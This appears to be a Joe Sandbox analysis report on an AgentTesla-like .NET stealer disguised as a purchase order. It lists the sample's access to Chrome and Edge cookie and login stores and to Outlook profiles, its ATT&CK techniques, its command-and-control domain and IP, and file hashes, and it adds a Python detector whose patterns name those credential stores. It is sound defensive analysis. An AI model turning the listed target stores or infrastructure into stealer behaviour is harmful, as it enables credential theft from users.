                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\colorcpl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\colorcpl.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
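The rows above are the detection-relevant core of this section: a Windows system binary (colorcpl.exe, injected into by the sample) opens the Chromium credential and cookie stores of Chrome and Edge and the Outlook profile hive, which no colour-management tool has any reason to touch. The script below is an added example, not part of the Joe Sandbox report, showing how to turn that observation into an allow-list check over behavior rows written in the report's own "Source: <process><action>: <target>" shape. The sample log lines are constructed for the example (the chrome.exe row is a benign control), and the allow list of processes permitted to read these stores is an assumption a deployment would tune.

```python
"""Flag credential-store access by processes that are not browsers or mail clients.

Added example (not the sandbox's own code). Input is constructed to mimic the
report's behavior rows; the allow list below is an assumption.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample input in the report's row format. The last two rows are
# benign controls: a real browser reading its own store, and a font query.
SAMPLE_LOG = r"""
Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
"""

# Assumed allow list: processes expected to read these stores legitimately.
ALLOWED_PROCESSES = {"chrome.exe", "msedge.exe", "outlook.exe"}

# Chromium credential / cookie / key-material files under "...\User Data\<profile>\...".
BROWSER_STORE = re.compile(
    r"\\User Data\\.*\\(Login Data|Cookies|Web Data|Local State)$", re.IGNORECASE)
# Outlook MAPI profile hive, where saved mail-account credentials live.
OUTLOOK_PROFILE = re.compile(
    r"\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE)

# One behavior row: process path (ends in .exe), action verb, target object.
ROW = re.compile(
    r"^Source: (?P<proc>.+?\.exe)"
    r"(?P<action>File opened|Key opened|Queries volume information): "
    r"(?P<target>.+)$")


@dataclass(frozen=True)
class Finding:
    process: str   # basename, lower-cased
    action: str
    target: str


def parse_rows(log_text):
    """Yield (process, action, target) for every row that matches ROW."""
    for line in log_text.splitlines():
        m = ROW.match(line.strip())
        if m:
            yield m.group("proc"), m.group("action"), m.group("target")


def is_credential_store(action, target):
    """True when the (action, target) pair touches a browser or mail credential store."""
    if action == "File opened":
        return BROWSER_STORE.search(target) is not None
    if action == "Key opened":
        return OUTLOOK_PROFILE.search(target) is not None
    return False


def find_credential_access(log_text):
    """Return Findings for non-allow-listed processes that open credential stores."""
    findings = []
    for proc, action, target in parse_rows(log_text):
        name = PureWindowsPath(proc).name.lower()
        if name in ALLOWED_PROCESSES:
            continue
        if is_credential_store(action, target):
            findings.append(Finding(name, action, target))
    return findings


if __name__ == "__main__":
    for f in find_credential_access(SAMPLE_LOG):
        print(f"ALERT {f.process}: {f.action} -> {f.target}")
```

Matching on the process basename alone is deliberate here because the injection host is a legitimately signed Windows binary; a signature or path check would pass it. In production the same logic maps onto Sysmon Event ID 11/12-style telemetry or EDR file-open events, with the allow list keyed on full path and signer rather than basename.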

Remote Access Functionality

Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

Only techniques with matched signatures are listed; the number in parentheses is the count of matching signatures. All other cells of the matrix carried no matches for this sample.

Reconnaissance: no matched signatures
Resource Development: no matched signatures
Initial Access: no matched signatures
Execution: no matched signatures
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (212), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1)
Defense Evasion: Process Injection (212), Virtualization/Sandbox Evasion (41), Software Packing (12), Obfuscated Files or Information (4), Masquerading (1), Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (121), System Information Discovery (113), Virtualization/Sandbox Evasion (41), Process Discovery (2)
Lateral Movement: no matched signatures
Collection: Email Collection (1), Archive Collected Data (1), Data from Local System (1)
Command and Control: Application Layer Protocol (2), Non-Application Layer Protocol (2), Encrypted Channel (1), Ingress Tool Transfer (1)
Exfiltration: no matched signatures
Impact: no matched signatures

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
2998MOD PO.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
2998MOD PO.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe

Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ladylawher.org | 3.33.130.190 | true | true | | unknown
www.ladylawher.org | unknown | unknown | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com/designers? | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
3.33.130.190 | ladylawher.org | United States | 8987 | AMAZONEXPANSIONGB | true

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1542414
                        Start date and time:2024-10-25 22:08:57 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2998MOD PO.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/2@1/1
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 59
                        • Number of non-executed functions: 281
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • VT rate limit hit for: 2998MOD PO.exe
                        Time | Type | Description
                        21:09:41 | Task Scheduler | Run new task: {C79E2195-35BD-48EB-8F1A-AFA020A41E93} path:
                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                        3.33.130.190 | 19387759999PO-RFQ-INVOICE-doc.exe | Get hash | malicious | FormBook | Browse | www.co2cartridges.net/rkra/
                        3.33.130.190 | PO 4800040256.exe | Get hash | malicious | FormBook | Browse | www.ks1x7i.vip/uxh9/
                        3.33.130.190 | PO 45003516.exe | Get hash | malicious | FormBook | Browse | www.ticketsmarche.city/jftr/
                        3.33.130.190 | OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe | Get hash | malicious | FormBook | Browse | www.robotcurut.xyz/37zt/
                        3.33.130.190 | quotation RFQ no 123609.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.micrhyms.info/uao9/
                        3.33.130.190 | Due Payment Invoice PISS2024993.exe | Get hash | malicious | FormBook | Browse | www.energyparks.net/24sh/
                        3.33.130.190 | QUOTE2342534.exe | Get hash | malicious | FormBook | Browse | www.huwin.club/cvus/
                        3.33.130.190 | Order.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.tukaari.shop/h8b0/
                        3.33.130.190 | Bill Of Lading_MEDUVB935991.pdf.exe | Get hash | malicious | FormBook | Browse | www.barbequecritics.com/el3s/
                        3.33.130.190 | FACTURA A-7507_H1758.exe | Get hash | malicious | GuLoader | Browse | www.wrl-llc.net/n7zc/
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                        AMAZONEXPANSIONGB | https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29t | Get hash | malicious | Unknown | Browse | 52.223.40.198
                        AMAZONEXPANSIONGB | 19387759999PO-RFQ-INVOICE-doc.exe | Get hash | malicious | FormBook | Browse | 3.33.130.190
                        AMAZONEXPANSIONGB | PO 4800040256.exe | Get hash | malicious | FormBook | Browse | 3.33.130.190
                        AMAZONEXPANSIONGB | PO 45003516.exe | Get hash | malicious | FormBook | Browse | 3.33.130.190
                        AMAZONEXPANSIONGB | la.bot.arm5.elf | Get hash | malicious | Unknown | Browse | 3.50.155.106
                        AMAZONEXPANSIONGB | la.bot.arm.elf | Get hash | malicious | Unknown | Browse | 3.39.219.125
                        AMAZONEXPANSIONGB | OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe | Get hash | malicious | FormBook | Browse | 3.33.130.190
                        AMAZONEXPANSIONGB | la.bot.sh4.elf | Get hash | malicious | Unknown | Browse | 160.1.253.55
                        AMAZONEXPANSIONGB | la.bot.m68k.elf | Get hash | malicious | Unknown | Browse | 3.41.17.239
                        AMAZONEXPANSIONGB | http://www.thegioimoicau.com/ | Get hash | malicious | Unknown | Browse | 3.33.220.150
                        No context
                        No context
                        Process:C:\Users\user\Desktop\2998MOD PO.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Windows\SysWOW64\colorcpl.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.701054610418416
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        • Win32 Executable (generic) a (10002005/4) 49.75%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Windows Screen Saver (13104/52) 0.07%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        File name:2998MOD PO.exe
                        File size:820'736 bytes
                        MD5:eba2ade6a60568538d8b918f65fa2f44
                        SHA1:fbb6cb7c1c403502560bfe74340b06f31775a7eb
                        SHA256:7b70d479034f458a6b695cc3c8aefd50c771ec183b749276aa66d18a6a33466c
                        SHA512:0cbc8cdaf8a87462fe5705370357686a8de596c07382be255f5a18e3b6668685f764f8e512f443f0e94707c2bd3b771326a156d4f2ee76d536a0c572fc9943f3
                        SSDEEP:24576:7o6pxBs45aB/DrikXJ5W7ncsu61KNAeV:tNISE/W7n7D8lV
                        TLSH:9F05BEC03B26772ADEA95B75D119DDB583F22968B040FAE25ADC3B93358D3109E0CF52
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..z............... ........@.. ....................................@................................
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x4c9916
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x671899DE [Wed Oct 23 06:38:22 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
